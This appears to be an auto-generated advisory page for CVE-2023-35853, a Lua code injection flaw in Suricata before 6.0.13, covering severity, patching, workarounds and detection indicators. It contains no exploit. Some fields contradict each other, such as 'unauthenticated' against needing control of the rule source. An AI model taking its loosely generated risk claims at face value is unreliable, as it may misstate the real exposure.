CVE-2023-35853 – This vulnerability allows an adversary who cont... (How to Fix)

Q: What is the severity of CVE-2023-35853?

CVE-2023-35853 has a CVSS score of 9.8 (CRITICAL). This vulnerability allows an adversary who controls an external source of Lua rules to execute arbitrary Lua code in Suricata. It affects Suricata installations before version 6.0.13 that use Lua rules from untrusted sources. The CVSS score of 9.8 indicates critical severity.

📋 TL;DR

This vulnerability allows an adversary who controls an external source of Lua rules to execute arbitrary Lua code in Suricata. It affects Suricata installations before version 6.0.13 that use Lua rules from untrusted sources. The CVSS score of 9.8 indicates critical severity.

💻 Affected Systems

Products:

Suricata

Versions: All versions before 6.0.13

Operating Systems: All operating systems running Suricata

Default Config Vulnerable: ✅ No

Notes: Only vulnerable if Lua rules are enabled and external rule sources are used. Default configuration may not be vulnerable.

📦 What is this software?

Suricata by Oisf

View all CVEs affecting Suricata →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Full system compromise through remote code execution, potentially allowing attacker to take control of the Suricata host, pivot to other systems, or disrupt network monitoring.

🟠

Likely Case

Execution of malicious Lua code within Suricata's context, potentially leading to data exfiltration, network traffic manipulation, or denial of service.

🟢

If Mitigated

Limited impact if Lua is disabled or only trusted rule sources are used, with potential for rule validation bypass at most.

🌐 Internet-Facing: HIGH

🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ✅ No

Weaponized: UNKNOWN

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

Exploitation requires control over Lua rule source, which could be achieved through various means including supply chain compromise or rule repository access.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 6.0.13

Vendor Advisory: https://github.com/OISF/suricata/commit/b95bbcc66db526ffcc880eb439dbe8abc87a81da

Restart Required: Yes

Instructions:

1. Upgrade Suricata to version 6.0.13 or later. 2. Restart Suricata service. 3. Verify the security.lua.allow-rules setting is properly configured if using Lua rules.

🔧 Temporary Workarounds

Disable Lua rules

all

Completely disable Lua functionality in Suricata configuration

Edit suricata.yaml: set 'lua.enabled: false'

Restrict Lua rule sources

all

Only allow Lua rules from trusted, controlled sources

Edit suricata.yaml security.lua section: set 'allow-rules: false' and only enable for specific trusted paths

🧯 If You Can't Patch

Disable Lua functionality entirely in configuration
Implement strict network controls to prevent Suricata from accessing external rule sources

🔍 How to Verify

Check if Vulnerable:

Check Suricata version with 'suricata --build-info' and verify if version is below 6.0.13 and Lua is enabled in configuration.

Check Version:

suricata --build-info | grep 'Version'

Verify Fix Applied:

Verify version is 6.0.13 or higher with 'suricata --build-info' and check that security.lua.allow-rules is properly configured.

📡 Detection & Monitoring

Log Indicators:

Unexpected Lua rule loading from external sources
Suricata process executing unexpected system commands
Errors related to Lua rule parsing

Network Indicators:

Suricata downloading rules from unexpected external sources
Outbound connections from Suricata process to suspicious destinations

SIEM Query:

process.name:suricata AND (network.destination.ip:<external_ip> OR process.args:*lua*)

📊 Metadata

CVE ID: CVE-2023-35853

CVSS v3 Score: 9.8 (CRITICAL)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE: CWE-94

Published: June 19, 2023

Last Updated: December 11, 2024

🔗 References

https://github.com/OISF/suricata/commit/b95bbcc66db526ffcc880eb439dbe8abc87a81da Patch,Vendor Advisory
https://github.com/OISF/suricata/compare/suricata-6.0.12...suricata-6.0.13 Vendor Advisory
https://www.stamus-networks.com/stamus-labs Not Applicable
https://github.com/OISF/suricata/commit/b95bbcc66db526ffcc880eb439dbe8abc87a81da Patch,Vendor Advisory
https://github.com/OISF/suricata/compare/suricata-6.0.12...suricata-6.0.13 Vendor Advisory
https://www.stamus-networks.com/stamus-labs Not Applicable

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2023-35853, you might also want to check these: